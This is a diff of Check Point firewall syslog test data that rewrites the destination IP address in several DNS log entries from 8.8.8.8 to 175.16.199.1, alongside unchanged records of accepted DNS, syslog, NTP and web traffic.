 <134>1 2020-03-29T18:19:51Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e6c7,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T18:20:21Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e6e5,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49163"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:20:21Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e6e5,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506021"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47088"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:20:21Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e6e5,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49163"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:20:21Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e6e5,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506021"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47088"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:20:21Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e6e5,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.55.116"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58824"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:20:24Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e6e8,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"129.250.35.250"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47847"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:20:31Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e6ef,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506031"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37391"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:20:31Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e6ef,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506031"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56970"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:20:31Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e6ef,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506031"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37391"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:20:31Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e6ef,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506031"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56970"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:20:33Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e6f1,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T18:20:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e6f2,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T18:20:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e6f3,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50732"; service:"443"; service_id:"https"; src:"192.168.1.117"]
@@ -3815,77 +3815,77 @@
 <134>1 2020-03-29T18:22:50Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e77a,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.36"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"39154"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10210"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T18:22:50Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e77a,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47894"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T18:22:50Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e77a,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"64224"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10211"; xlatesrc:"0.0.0.0"]
-<134>1 2020-03-29T18:22:57Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e781,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46692"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:22:57Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e781,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506177"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37261"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:22:57Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e781,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506177"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36806"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:22:57Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e781,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506177"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56003"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:22:57Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e781,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506177"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58189"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:22:57Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e781,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506177"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35644"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:22:57Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e781,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46692"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:22:57Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e781,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506177"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37261"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:22:57Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e781,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506177"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36806"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:22:57Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e781,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506177"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56003"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:22:57Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e781,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506177"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58189"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:22:57Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e781,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506177"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35644"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:22:57Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e781,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.55.30"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"44976"; service:"443"; service_id:"https"; src:"192.168.2.2"]
